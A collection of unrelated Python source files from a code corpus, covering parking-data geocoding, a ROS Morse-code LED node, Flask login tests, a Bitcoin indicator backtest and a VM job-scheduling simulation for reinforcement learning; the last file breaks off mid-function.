하지만 데이터를 못찾는 부분이 존재함\nfor i in park.index:\n try :\n addr_ll = gmaps.geocode(park['주소'][i], language='ko')[0]['geometry']['location']\n addr_x = str(addr_ll['lat'])\n addr_y = str(addr_ll['lng'])\n except :\n 1\n finally:\n print(i, addr_x, addr_y, park.주차장명[i])\n park['위도'][i] = addr_x\n park['경도'][i] = addr_y\n\n\n\n# 자치단체 주차장 현황 data 삽입\nschool = pd.read_csv('./data/2018_parking_school_chu.csv')\n\n# column name을 보기 편하게 변경\nschool.rename(columns={\"주차장유형 (노상/노외/부설)\":\"주차장유형\",\n \"전화번호 (주차장관리자)\":\"전화번호\"}, inplace=True)\n\n\n# 주차장명이 없는 CASE\nrow, col = school.shape\nfor i in range(row):\n # 주차장명이 float(nan) 인 경우 해당 row를 삭제\n if type(school['주차장명'][i]) == float:\n school.drop([i], inplace=True)\n\n \nfor i in school.index:\n # 관리기관의 data가 nan인 경우 어차피 교육청이 관리하므로 교육청을 복사해줌!\n if type(school.loc[i].관리기관) == float:\n school.loc[i].관리기관 = school.loc[i].시도 + '교육청'\n\n\n# 개방시작, 개방종료 시간 양식 통일화\n# ex1) 0:00 -> 00:00\n# ex2) 미개방 -> nan\nfor cols in school.keys():\n if '개방' in cols:\n for i in school.index:\n try:\n len(school[cols][i])\n except:\n 1\n else:\n if len(school[cols][i]) == 4 and ':00' in school[cols][i]:\n school[cols][i] = '0' + school[cols][i]\n elif '24:00' in school[cols][i]:\n school[cols][i] = '24:00'\n print(\"num!\", i)\n\n# 개방시작시간, 개방종료시간 combine\n# 14일 00:00, 24:00 -> 14,00:00~24:00\n# day_flag(개방시작시간) == 0\n# day_flag(개방종료시간) == 1\nday_flag = 0\nfor cols in school.keys():\n # 개방시작시간 읽으면서 종료시간까지 읽고 combine하여 새로운 column 생성\n if '개방' in cols and day_flag == 0:\n day_flag = 1\n days, tmp = cols.split(', ')\n year, month, day_week = days.split('.')\n new_cols = month+'.'+day_week\n day, week = day_week.split('(')\n \n school[new_cols] = day + ',' + school[cols] + '~' + school[days+', 개방종료시간']\n school.rename(columns={cols:days}, inplace=True)\n \n elif day_flag == 1:\n day_flag = 0\n\n# 기존의 날짜 column 삭제\nfor cols in school.keys():\n if \"18\" in cols or 'Unnamed' in cols:\n del school[cols]\n\n# 위도가 비어있는 부분을 찾아 print하여 확인하는 작업\n# print를 이제 dict에서 x, y에 저장해야 하지만 데이터를 못찾는 부분이 존재함\nfor i in school.index:\n try :\n addr_ll = gmaps.geocode(school['주소'][i], language='ko')[0]['geometry']['location']\n addr_x = str(addr_ll['lat'])\n addr_y = str(addr_ll['lng'])\n except :\n 1\n finally:\n print(i, addr_x, addr_y, school.주차장명[i])\n school['위도'][i] = addr_x\n school['경도'][i] = addr_y\n\n \ncombined = pd.merge(park, school, how='outer')\n\n# index column 삭제\nfor cols in park.keys():\n if 'Unnamed' in cols:\n del combined[cols]\n\n\n# final.csv를 저장\ncombined.to_csv('./data/final_data_chu.csv', encoding='utf-8-sig')\n","sub_path":"Read_data_final.py","file_name":"Read_data_final.py","file_ext":"py","file_size_in_byte":5765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"446925621","text":"#!/usr/bin/env python\n# Software License Agreement (BSD License)\n#\n# Copyright (c) 2017, Daniel Persson\n#\n# morse_middleman.py\n# Node in between user input node and hardware (LED blink) node. Does translation from text\n# to morse blinks.\n\nimport rospy\nfrom std_msgs.msg import String\nfrom led_blink.srv import Morse\nfrom led_blink.msg import Blink\n\n# Speed: n*0.25 seconds.\nSPEED = 1;\n\n# Helper functions in order to control LED on/off and duration for morse chars.\ndef beep(x):\n return {\n ' ': False,\n '-': True,\n '_': True\n }[x]\ndef length(x):\n return {\n ' ': 1,\n '-': 1,\n '_': 2\n }[x]\n\ndef callback(data):\n pub = rospy.Publisher('userinput', Blink, queue_size=100)\n rospy.loginfo(rospy.get_caller_id() + 'I heard %s', data.data)\n \n # Use the morse_translate service to translate from text to '-_ ':s.\n morse_translate = rospy.ServiceProxy('morse_translate', Morse)\n morse = morse_translate(data.data)\n \n # Go through the translation and send beeps to hardware node.\n for c in morse.morse:\n msg = Blink()\n msg.on = beep(c) # True if the LED should be on.\n msg.timeout = SPEED*length(c) # Duration of blink.\n pub.publish(msg) \n \n # Beeps must have silence in between, which is added here.\n if (msg.on):\n msg = Blink()\n msg.on = False\n msg.timeout = SPEED*2\n pub.publish(msg)\n\ndef listener():\n rospy.init_node('morse_middleman', anonymous=True)\n rospy.Subscriber('userinput_morse', String, callback)\n \n rospy.spin()\n\nif __name__ == '__main__':\n listener()","sub_path":"src/led_blink/scripts/morse_middleman.py","file_name":"morse_middleman.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"563019097","text":"N, M = map(int, input().split())\nS = input()\n\np = N\nprev = N\nflag = True\nans = []\nfor i in range(N, -1, -1):\n if (prev - i) > M:\n ans.append(prev - p)\n prev = p\n if (prev - i) > M:\n flag = False\n break\n if S[i] == \"0\":\n p = i\nans.append(prev)\nif flag:\n print(\" \".join(map(str, ans[::-1])))\nelse:\n print(-1)\n","sub_path":"Python_codes/p02852/s049319162.py","file_name":"s049319162.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"152716166","text":"'''\nCreated on Dec 3, 2013\n\n@author: lasitha\n'''\n\n\nclass BiGramSearcher:\n \n \n def getCount(self,sentense):\n thefile = open('NgramCorpuses/w2_.txt','r')\n frequency =0\n for line in thefile:\n temp = ' '.join(line.split()) \n \n if sentense in temp:\n \n frequency = line.split()[0]\n return frequency\n thefile.close()\n \n return frequency","sub_path":"Twitter/src/BiGramSearcher.py","file_name":"BiGramSearcher.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"112298593","text":"import sys\nimport os.path\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir, 'app')))\nimport unittest\nfrom main import app\nfrom app.models import *\nfrom sample_db import example_data\nfrom connect import connect_to_db\nfrom flask_login import login_user, current_user\nfrom app.routes import login, logout, register, home\nfrom app.login import post_resistration\nfrom app.forms import RegistrationForm\nimport datetime\n\n\nclass FlaskTestLogin(unittest.TestCase):\n\n\tdef setUp(self):\n\t\t\"\"\"Do before every test\"\"\"\n\n\t\t# Get the Flask test client\n\t\tself.client = app.test_client()\n\t\tapp.config['TESTING'] = True\n\t\tself._ctx = app.test_request_context()\n\t\tself._ctx.push()\n\n\t\t# Connect to test database\n\t\tconnect_to_db(app, 'sqlite:////tmp/test.db')\n\n\t\t# Create tables and add sample data\n\t\tdb.create_all()\n\t\texample_data()\n\n\tdef tearDown(self):\n\t\t\"\"\"Do at end of every test\"\"\"\n\t\tif self._ctx is not None:\n\t\t\tself._ctx.pop()\n\n\t\tdb.session.close()\n\t\tdb.drop_all()\n\n\t\"\"\"Test login\"\"\"\n\n\tdef test_login(self):\n\t\tresult = login()\n\t\tself.assertIn(\"Log In\", result)\n\n\tdef test_logout(self):\n\t\tlogin_user(User.query.get(1))\n\t\tself.assertEquals(current_user.username, 'karen')\n\t\tself.assertFalse(current_user.is_anonymous)\n\t\tlogout()\n\t\tself.assertTrue(current_user.is_anonymous)\n\n\tdef test_register_page(self):\n\t\tresult = register()\n\t\tself.assertIn(\"Sign Up\", result)\n\n\tdef test_post_resistration(self):\n\t\tuser = User.query.filter_by(username=\"susan\").first()\n\t\tself.assertIsNone(user)\n\t\tform = RegistrationForm(username=\"susan\", email=\"susan@example.com\", password=\"susan\", password_repeat=\"susan\", fname=\"Susan\", lname=\"Smith\", birthday=datetime.date(1993, 7, 3))\n\t\tpost_resistration(form)\n\t\tuser = User.query.filter_by(username=\"susan\").first()\n\t\tself.assertIsNotNone(user)\n\n\n\t\"\"\"Test homepage\"\"\"\n\n\tdef test_home(self):\n\t\tlogin_user(User.query.get(1))\n\t\tresult = home()\n\t\tself.assertIn(\"Discover\", result)\n\t\tself.assertIn(\"

        Coming Up

        \", result)\n\n\nif __name__ == '__main__':\n\tunittest.main()","sub_path":"tests/test_login.py","file_name":"test_login.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"561631587","text":"import numpy as np\r\nfrom random import randint\r\nfrom pprint import pprint\r\n\r\ndef assign_var_len_tslots(row):\r\n duration = randint(2,6)\r\n start = randint(0, 25-duration)\r\n row = row.reshape((1, 26))\r\n row[:, start:start+duration] = 1\r\n return row\r\n\r\ndef assign_fix_len_tslots(row):\r\n row = row.reshape((1, 5))\r\n row[:] = 1\r\n return row\r\n\r\ndef conflicts_within_array(size, apply_func):\r\n class_tslots = np.zeros(size)\r\n np.apply_along_axis(apply_func, 1, class_tslots)\r\n conflicts = np.triu(class_tslots.dot(class_tslots.T), 1)\r\n num_of_conflicts = np.count_nonzero(conflicts)\r\n pprint(conflicts)\r\n return num_of_conflicts\r\n\r\nprint(\"array(15, 56) random lengths 2-5 inclusive conflicts\")\r\nprint(conflicts_within_array((15, 26), assign_var_len_tslots))\r\n\r\nprint(\"\\narray(15, 5) fixed length 5 conflicts\")\r\nprint(\"sanity check should be equal to 15*14/2 == 105\")\r\nprint(conflicts_within_array((15, 5), assign_fix_len_tslots))","sub_path":"numpy_conflicts.py","file_name":"numpy_conflicts.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"345050719","text":"# Code modified and fixed from Stock Technical Analysis with Python\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport talib as ta\n\n### DATA\ndf = pd.read_csv(\"./coinbaseBTCUSD_1min_2014-12-01_to_2017-10-20.csv\")\ndf.timestamp = pd.to_datetime(df.timestamp,unit='s') # timestamp is in seconds\ndf.index = df.timestamp\ndel df['timestamp']\ndf = df.loc['2014-12-01T06:00:00':'2017-10-19T23:59:00'] # remove rows that do no lie within the hour window\n\n# resample to hourly data to daily\ndf = df.resample(rule=\"120T\").agg(\n\t\t{'open':'first','high':'max','low':'min','close':'last','volbtc':'sum','volusd':'sum','wtdprice':'last'})\n# 2017- data\ndf = df['1-1-2017':].copy()\n# bollinger bands\ndf['bb_high'],df['bb_mid'],df['bb_low'] = ta.BBANDS(np.asarray(df.close),\n timeperiod=7,nbdevup=1.5,nbdevdn=1.5,matype=0)\n# rsi\ndf['rsi'] = ta.RSI(np.asarray(df.close),timeperiod=7)\n\n### TRADING SIGNAL (buy=1 , sell=-1, hold=0)\n# price cross over BB and RSI cross over threshold\n# backteset BB to avoid back-testing bias\ndf['close_lag1'] = df.close.shift(1)\ndf['bb_low_lag1'] = df.bb_low.shift(1)\ndf['bb_high_lag1'] = df.bb_high.shift(1)\ndf['close_lag2'] = df.close.shift(2)\ndf['bb_low_lag2'] = df.bb_low.shift(2)\ndf['bb_high_lag2'] = df.bb_high.shift(2)\ndf['rsi_lag1'] = df.rsi.shift(1)\ndf['rsi_lag2'] = df.rsi.shift(2)\n\n# generate trading signals\ndf['signal'] = 0 # default to do nothing\n# TODO: refine until the signals look right!!!!\n# if lag2 price is less than lag2 bb lower and the oppostive for lag1 values, then buy signal\ndf.loc[(df.close_lag2df.bb_high_lag2) & (df.close_lag1>df.bb_high_lag1) & (df.rsi_lag1>85),'signal'] = -1\n# first signal will be a buy\ndf.iloc[0,df.columns.get_loc('signal')] = 1\n\nprint(df.signal.value_counts())\n\n### TRADING STRATEGY\n# own asset=1, not own asset=0\ndf['portfolio'] = 1\nportfolio = 0\nfor i,r in enumerate(df.iterrows()):\n\tif r[1]['signal']==1:\n\t\tportfolio = 1\n\telif r[1]['signal']==-1:\n\t\tportfolio = 0\n\telse:\n\t\tportfolio = df.portfolio[i-1]\n\tdf.iloc[i,df.columns.get_loc('portfolio')] = portfolio\n\n### ANALYSIS\n# Strategies Daily Returns\n# Bands Crossover Strategy Without Trading Commissions\n# TODO: can't i just do df.close.diff()*df.portfolio?\ndf['trade_returns'] = ((df.close/df.close_lag1)-1)*df.portfolio\ndf.iloc[0,df.columns.get_loc('trade_returns')] = 0.0 # no return for the first period\n# Buy and Hold Strategy\ndf['bh_returns'] = (df.close/df.close_lag1)-1\ndf.iloc[0,df.columns.get_loc('bh_returns')] = 0.0 # no return for the first period\n\n# Strategies Cumulative Returns\n# Cumulative Returns Calculation\n# TODO: check calculations\ndf['trade_cum_returns'] = (np.cumprod(df.trade_returns+1)-1)\ndf['bh_cum_returns'] = (np.cumprod(df.bh_returns+1)-1)\n\n# Strategies Performance Metrics\n# Annualized Returns\ntrade_yr_returns = df.trade_cum_returns.tail(1).values[0]\nbh_yr_returns = df.bh_cum_returns.tail(1).values[0]\n# Annualized Standard Deviation\ntrade_std = np.std(df.trade_returns.values)*np.sqrt(365.) # cryptos trade 365\nbh_std = np.std(df.bh_returns.values)*np.sqrt(365.)\n# Annualized Sharpe Ratio\ntrade_sharpe = trade_yr_returns/trade_std\nbh_sharpe = bh_yr_returns/bh_std\n\n# Summary Results Data Table\nprint('\\n')\nsummary_df = pd.DataFrame(\n\t\t{'Summary' :['Return','Std Dev','Sharpe (Rf=0%)'],'Trade':[trade_yr_returns,trade_std,trade_sharpe],\n\t\t 'Buy&Hold':[bh_yr_returns,bh_std,bh_sharpe]})\nsummary_df = summary_df[['Summary','Trade','Buy&Hold']]\nwith pd.option_context('display.precision',2):\n\tprint(summary_df)\n\n# CHARTING\nfig1,ax = plt.subplots(5,sharex=True)\nax[0].plot(df['close'])\nax[0].plot(df['bb_high'],linestyle='--',label='high')\nax[0].plot(df['bb_mid'],linestyle='--',label='middle')\nax[0].plot(df['bb_low'],linestyle='--',label='low')\nax[0].legend(loc='upper left')\nax[1].plot(df['rsi'],color='green',label='rsi')\nax[1].axhline(y=85,linestyle='--',color='orange')\nax[1].axhline(y=35,linestyle='--',color='orange')\nax[1].legend(loc='upper left')\nax[2].plot(df['signal'],marker='o',markersize=5,linestyle='',label='signal',color='red')\nax[2].legend(loc='upper left')\nax[3].plot(df['portfolio'],marker='o',markersize=5,linestyle='',label='portfolio',color='green')\nax[3].legend(loc='upper left')\nax[4].plot(df['trade_cum_returns'],label='trade')\nax[4].plot(df['bh_cum_returns'],label='buy&hold')\nax[4].legend(loc='upper left')\nplt.suptitle('BTC 2hr Close Prices, BB (7, 1.5), & RSI (7)')\nplt.show()\n\n# additional indicators\ndf['cci'] = ta.CCI(np.asarray(df['high']), np.asarray(df['low']), np.asarray(df['close']), timeperiod=7)\ndf['roc'] = ta.ROC(np.asarray(df['close']), timeperiod=21)\ndf['rsi2'] = ta.RSI(np.asarray(df.close),timeperiod=2)\ndf['rsi14'] = ta.RSI(np.asarray(df.close),timeperiod=14)\ndf['cci2'] = ta.CCI(np.asarray(df['high']), np.asarray(df['low']), np.asarray(df['close']), timeperiod=3)\n\n\nfig1,ax = plt.subplots(2,sharex=True)\nax[0].plot(df['close'])\nax[0].legend(loc='upper left')\nax[1].plot(df['cci'],color='green')\nax[1].plot(df['roc'],color='red')\nax[1].legend(loc='upper left')\nplt.suptitle('BTC 2hr Close Prices, CCI(7), ROC(7)')\nplt.show()\n\n\n# persist df\ndf.to_csv(\"./coinbaseBTCUSD-withsignals-2hr.csv\")\n","sub_path":"code/archive/label-bb-rsi-2hr.py","file_name":"label-bb-rsi-2hr.py","file_ext":"py","file_size_in_byte":5433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"161941766","text":"from tkinter import *\r\nimport sys\r\nimport os\r\nimport subprocess\r\nfrom sys import platform\r\n\r\nclass Empsal:\r\n\r\n \r\n def __init__(self, root):\r\n\r\n self.main_lbl=Label(root, text='Experience Vs.Salary Linear Regression \\n and Predict Salary Based On Experience', fg='red', font=('Arial', -22, 'bold underline'))\r\n self.main_lbl.place(x=150, y=200)\r\n \r\n self.callPython = \"\"\r\n if platform == \"linux\" or platform == \"linux2\":\r\n self.callPython = \"python3\"\r\n elif platform == \"win32\":\r\n self.callPython = \"python.exe\"\r\n\r\n self.menubar=Menu(root)\r\n root.config(menu=self.menubar) \r\n self.mysql_menu=Menu(root, tearoff=0)\r\n\r\n self.menubar.add_cascade(label='Data Conversion', menu=self.mysql_menu)\r\n self.mysql_menu.add_command(label='Build DF', command=self.create_df)\r\n self.mysql_menu.add_command(label='Build CSV', command=self.create_csv)\r\n self.mysql_menu.add_command(label='Convert to Excel', command=self.mysql_to_xls)\r\n \r\n \r\n self.mysql_menu.add_separator()\r\n self.mysql_menu.add_command(label='Exit', command=root.destroy)\r\n\r\n self.data_menu=Menu(root, tearoff=0)\r\n self.menubar.add_cascade(label='Reports', menu=self.data_menu)\r\n self.data_menu.add_command(label='Rep1', command=self.rep1)\r\n self.data_menu.add_command(label='Rep2', command=self.rep2)\r\n self.data_menu.add_command(label='Rep3', command=self.rep3)\r\n self.data_menu.add_command(label='Plot', command=self.plot)\r\n \r\n \r\n self.predict_menu=Menu(root, tearoff=0)\r\n self.menubar.add_cascade(label='Prediction', menu=self.predict_menu)\r\n self.predict_menu.add_command(label='Predict', command=self.predict)\r\n \r\n\r\n def create_df(self):\r\n subprocess.check_call([self.callPython,\"create_df.py\"])\r\n def create_csv(self):\r\n subprocess.check_call([self.callPython,\"create_csv.py\"])\r\n def mysql_to_xls(self):\r\n subprocess.check_call([self.callPython, \"create_excl.py\"])\r\n \r\n def rep1(self):\r\n subprocess.check_call([self.callPython, \"rep1.py\"])\r\n def rep2(self): \r\n subprocess.check_call([self.callPython, \"rep2.py\"])\r\n def rep3(self):\r\n subprocess.check_call([self.callPython, \"rep3.py\"]) \r\n def plot(self):\r\n subprocess.check_call([self.callPython, \"plot.py\"])\r\n \r\n def predict(self):\r\n subprocess.check_call([self.callPython, \"predict.py\"]) \r\n#=====================================================================================================\r\n \r\nroot=Tk()\r\nroot.title('Experience vs. Salary Linear Regression and predict Salary based on Experience')\r\n\r\nobj=Empsal(root)\r\nroot.geometry('800x600')\r\nroot.mainloop()\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n","sub_path":"project/menuprog.py","file_name":"menuprog.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"432304915","text":"import numpy as np\nfrom scipy import stats\nimport matplotlib.pyplot as plt\n\nnp.random.seed(3)\n\nclass SchedulingEnvironment:\n def __init__(self):\n # -------------------------------- VM info -------------------------------------\n self.VMnum = 10\n self.VMtypes = [0, 0, 0, 0, 0, 1, 1, 1, 1, 1]\n self.VMcapacity = 1000 # mips\n self.VMEnergypertimeunit = [1.25, 1.5, 1.25, 1.5, 1.25, 1.25, 1.5, 1.25 ,1.5, 1.25]\n \n self.actionNum = self.VMnum\n \n self.s_features = 1 + self.VMnum # consider waitT\n # ----------------------------------- workload -----------------------------------\n self.jobMI = 100 # short job\n self.jobMI_std = 20\n self.lamda_range = [30, 70] # arrival rate range\n\n # generate jobs' arrivalT\n self.totalDuration = 200\n self.timeCycle = 5 # frequency of change lamda\n self.changeTimes = int(self.totalDuration / self.timeCycle)\n self.lamdas = np.zeros(self.changeTimes)\n self.arrival_Times = self.gen_random_jobsTimes(self.lamda_range[0], self.lamda_range[1])\n self.jobNum = len(self.arrival_Times)\n\n # generate jobs' other attrs\n self.jobsMI = np.zeros(self.jobNum)\n self.lengths = np.zeros(self.jobNum)\n self.types = np.zeros(self.jobNum)\n self.ddl = np.ones(self.jobNum) * 0.25 # 250ms = waitT + exeT\n self.gen_random_jobsOthers()\n\n \n # >>>>>>>>>>>>>random policy<<<<<<<<<<<<\n \n self.RAN_events = np.zeros((9, self.jobNum))\n # 1-idle time 2-jobNum on it\n self.RAN_VM_events = np.zeros((2, self.VMnum))\n # >>>>>>>>>>>>>round robin policy<<<<<<<<<<<<\n self.RR_events = np.zeros((9, self.jobNum))\n self.RR_VM_events = np.zeros((2, self.VMnum))\n # >>>>>>>>>>>>>earliest policy<<<<<<<<<<<<\n self.early_events = np.zeros((9, self.jobNum))\n self.early_VM_events = np.zeros((2, self.VMnum))\n # >>>>>>>>>>>>>DQN policy<<<<<<<<<<<<\n self.DQN_events = np.zeros((9, self.jobNum))\n self.DQN_VM_events = np.zeros((2, self.VMnum))\n \n def gen_random_jobsTimes(self, low, high):\n # generate arrival time of jobs (poisson distribution)\n lamdas = np.random.randint(low, high+1, self.changeTimes) # [low, high]\n self.lamdas = lamdas\n \n # (lamda change according to time)\n maxJobNum = self.totalDuration * high\n temp_arrivalT = np.zeros(maxJobNum)\n jobC = 1 # initial jobNum, first job arrivalT = 0\n tempCycle = 0\n for w in range(self.changeTimes):\n while True:\n intervalT = stats.expon.rvs(scale=1 / lamdas[w], size=1)\n tempCycle += intervalT\n if tempCycle >= (w+1) * self.timeCycle:\n break\n temp_arrivalT[jobC] = temp_arrivalT[jobC-1] + intervalT\n jobC += 1\n firstZero = np.argwhere(temp_arrivalT == 0)[1][0] # e.g. [[0][5019][5020]...]\n print('maxJobNum:', maxJobNum, ' realJobNum:', firstZero)\n arrivalT = temp_arrivalT[0:firstZero]\n\n last_arrivalT = arrivalT[- 1]\n print('last job arrivalT:', round(last_arrivalT, 3))\n return arrivalT\n\n def gen_random_jobsOthers(self):\n # generate jobs' length\n \n self.jobsMI = np.random.normal(self.jobMI, self.jobMI_std, self.jobNum)\n self.jobsMI = self.jobsMI.astype(int)\n print(\"MI mean: \", round(np.mean(self.jobsMI), 3), ' MI SD:', round(np.std(self.jobsMI, ddof=1), 3))\n self.lengths = self.jobsMI / self.VMcapacity\n print(\"length mean: \", round(np.mean(self.lengths), 3), ' length SD:', round(np.std(self.lengths, ddof=1), 3))\n\n # generate jobs' type\n types = np.zeros(self.jobNum)\n \n # (random probability)\n print('typePro:', end='')\n \n timeC = 1\n typePro = np.random.uniform()\n for i in range(self.jobNum):\n if self.arrival_Times[i] >= 5 * timeC:\n typePro = np.random.uniform()\n print(round(typePro, 3), '', end='')\n timeC += 1\n if np.random.uniform() < typePro:\n types[i] = 0\n else:\n types[i] = 1\n print('')\n self.types = types\n\n def gen_fixed_workload(self, lamda):\n \n all_intervalT = np.zeros(self.jobNum)\n change_jobs = int(self.jobNum / len(lamda))\n for w in range(len(lamda)):\n intervalT = stats.expon.rvs(scale=1 / lamda[w], size=change_jobs)\n print('lamda:', lamda[w], 'intervalT mean: ', round(np.mean(intervalT), 3), ' intervalT SD:',\n round(np.std(intervalT, ddof=1), 3))\n all_intervalT[w*change_jobs : (w+1)*change_jobs] = intervalT\n arrival_Times = np.around(all_intervalT.cumsum(), decimals=3)\n self.arrival_Times = arrival_Times\n last_arrivalT = arrival_Times[- 1]\n print('last job arrivalT:', round(last_arrivalT, 3))\n\n # generate jobs' length\n \n self.jobsMI = np.random.normal(self.jobMI, self.jobMI_std, self.jobNum)\n self.jobsMI = self.jobsMI.astype(int)\n print(\"MI mean: \", round(np.mean(self.jobsMI), 3), ' MI SD:', round(np.std(self.jobsMI, ddof=1), 3))\n self.lengths = self.jobsMI / self.VMcapacity\n print(\"length mean: \", round(np.mean(self.lengths), 3), ' length SD:', round(np.std(self.lengths, ddof=1), 3))\n\n # generate jobs' type\n types = np.zeros(self.jobNum)\n for i in range(self.jobNum):\n if np.random.uniform() < 0.5:\n types[i] = 0\n else:\n types[i] = 1\n self.types = types\n\n def reset(self):\n # if each episode generates new workload\n self.arrival_Times = self.gen_random_jobsTimes(self.lamda_range[0], self.lamda_range[1])\n self.jobNum = len(self.arrival_Times)\n self.jobsMI = np.zeros(self.jobNum)\n self.lengths = np.zeros(self.jobNum)\n self.types = np.zeros(self.jobNum)\n self.ddl = np.ones(self.jobNum) * 0.25 # 250ms = waitT + exeT\n self.gen_random_jobsOthers()\n\n # reset all records\n self.RAN_events = np.zeros((9, self.jobNum)) # random policy\n self.RAN_VM_events = np.zeros((2, self.VMnum))\n self.RR_events = np.zeros((9, self.jobNum)) # round robin policy\n self.RR_VM_events = np.zeros((2, self.VMnum))\n self.early_events = np.zeros((9, self.jobNum)) # earliest policy\n self.early_VM_events = np.zeros((2, self.VMnum))\n self.DQN_events = np.zeros((9, self.jobNum)) # DQN policy\n self.DQN_VM_events = np.zeros((2, self.VMnum))\n \n\n def workload(self, job_count):\n arrival_time = self.arrival_Times[job_count-1]\n length = self.lengths[job_count-1]\n jobType = self.types[job_count-1]\n ddl = self.ddl[job_count-1]\n if job_count == self.jobNum:\n finish = True\n else:\n finish = False\n job_attributes = [job_count-1, arrival_time, length, jobType, ddl]\n return finish, job_attributes\n\n def feedback(self, job_attrs, action, policyID):\n job_id = job_attrs[0]\n arrival_time = job_attrs[1]\n length = job_attrs[2]\n job_type = job_attrs[3]\n ddl = job_attrs[4]\n \n \n if self.VMtypes[action] == 1 :\n self.VMEnergypertimeunit[action] = 1.5\n real_length = length / 2\n else:\n self.VMEnergypertimeunit[action] = 1.25\n real_length = length\n \n if policyID == 1:\n idleT = self.RAN_VM_events[0, action]\n elif policyID == 2:\n idleT = self.RR_VM_events[0, action]\n elif policyID == 3:\n idleT = self.early_VM_events[0, action]\n elif policyID == 4:\n idleT = self.DQN_VM_events[0, action]\n elif policyID == 5:\n idleT = self.suit_VM_events[0, action]\n elif policyID == 6:\n idleT = self.sensible_VM_events[0, action]\n\n # waitT & start exeT\n if idleT <= arrival_time: # if no waitT\n waitT = 0\n startT = arrival_time\n else:\n waitT = idleT - arrival_time\n startT = idleT\n \n durationT = waitT + real_length # waitT+exeT\n leaveT = startT + real_length # leave T\n new_idleT = leaveT # update VM idle time\n \n Energyfunction = self.VMEnergypertimeunit[action]\n Q0S = - durationT/length\n total_energy = real_length * Energyfunction\n # reward\n reward = - (Q0S/durationT) * (1/total_energy)\n \n\n # whether success\n #success = 1 if durationT <= ddl else 0\n success = 1 if total_energy <= 0.090 else 0\n \n Energy = [total_energy, real_length, Q0S, Q0S/durationT, durationT]\n \n\n if policyID == 1:\n self.RAN_events[0, job_id] = action\n self.RAN_events[2, job_id] = waitT\n self.RAN_events[1, job_id] = startT\n self.RAN_events[3, job_id] = durationT\n self.RAN_events[4, job_id] = leaveT\n self.RAN_events[5, job_id] = reward\n self.RAN_events[6, job_id] = real_length\n self.RAN_events[7, job_id] = success\n # update VM info\n self.RAN_VM_events[1, action] += 1\n self.RAN_VM_events[0, action] = new_idleT\n # print('VMC_after:', self.RAN_VM_events[0, action])\n elif policyID == 2:\n self.RR_events[0, job_id] = action\n self.RR_events[2, job_id] = waitT\n self.RR_events[1, job_id] = startT\n self.RR_events[3, job_id] = durationT\n self.RR_events[4, job_id] = leaveT\n self.RR_events[5, job_id] = reward\n self.RR_events[6, job_id] = real_length\n self.RR_events[7, job_id] = success\n # update VM info\n self.RR_VM_events[1, action] += 1\n self.RR_VM_events[0, action] = new_idleT\n elif policyID == 3:\n self.early_events[0, job_id] = action\n self.early_events[2, job_id] = waitT\n self.early_events[1, job_id] = startT\n self.early_events[3, job_id] = durationT\n self.early_events[4, job_id] = leaveT\n self.early_events[5, job_id] = reward\n self.early_events[6, job_id] = real_length\n self.early_events[7, job_id] = success\n # update VM info\n self.early_VM_events[1, action] += 1\n self.early_VM_events[0, action] = new_idleT\n elif policyID == 4:\n self.DQN_events[0, job_id] = action\n self.DQN_events[2, job_id] = waitT\n self.DQN_events[1, job_id] = startT\n self.DQN_events[3, job_id] = durationT\n self.DQN_events[4, job_id] = leaveT\n self.DQN_events[5, job_id] = reward\n self.DQN_events[6, job_id] = real_length\n self.DQN_events[7, job_id] = success\n # update VM info\n self.DQN_VM_events[1, action] += 1\n self.DQN_VM_events[0, action] = new_idleT\n elif policyID == 5:\n self.suit_events[0, job_id] = action\n self.suit_events[2, job_id] = waitT\n self.suit_events[1, job_id] = startT\n self.suit_events[3, job_id] = durationT\n self.suit_events[4, job_id] = leaveT\n self.suit_events[5, job_id] = reward\n self.suit_events[6, job_id] = real_length\n self.suit_events[7, job_id] = success\n \n return Energy, reward\n\n def feedbackD(self, job_attrs, action): # reject job\n job_id = job_attrs[0]\n self.DQN_events[2, job_id] = 0 # waitT\n self.DQN_events[1, job_id] = 0 # startT\n self.DQN_events[3, job_id] = 0 # durationT\n self.DQN_events[4, job_id] = 0 # leaveT\n self.DQN_events[5, job_id] = 0 # reward\n self.DQN_events[6, job_id] = 0 # real_length\n self.DQN_events[7, job_id] = 0 # success\n self.DQN_events[8, job_id] = 1 # whether reject\n # update VM info\n self.DQN_events[0, job_id] = action\n self.DQN_VM_events[1, action] += 1\n\n return self.DQN_events[5, job_id]\n\n def get_VM_idleT(self, policyID):\n if policyID == 3:\n idleTimes = self.early_VM_events[0, :]\n elif policyID == 4:\n idleTimes = self.DQN_VM_events[0, :]\n elif policyID == 5:\n idleTimes = self.suit_VM_events[0, :]\n return idleTimes\n\n def getState(self, job_attrs, policyID):\n arrivalT = job_attrs[1]\n length = job_attrs[2]\n job_type = job_attrs[3]\n\n # state_job = [length, job_type]\n state_job = [job_type]\n # wait Time\n if policyID ==4: # DQN\n idleTimes = self.get_VM_idleT(4)\n elif policyID ==5: # suitable\n idleTimes = self.get_VM_idleT(5)\n waitTimes = [t - arrivalT for t in idleTimes]\n waitTimes = np.maximum(waitTimes, 0)\n # print('waitTimes:', waitTimes, ' ', end='')\n\n state = np.hstack((state_job, waitTimes)) # only consider job length & waitT\n return state\n\n def getStateP(self, job_id):\n duration = self.sensible_events[3, job_id]\n return duration\n\n\n def get_accumulateRewards(self, policies, start, end):\n rewards = np.zeros(policies)\n\n 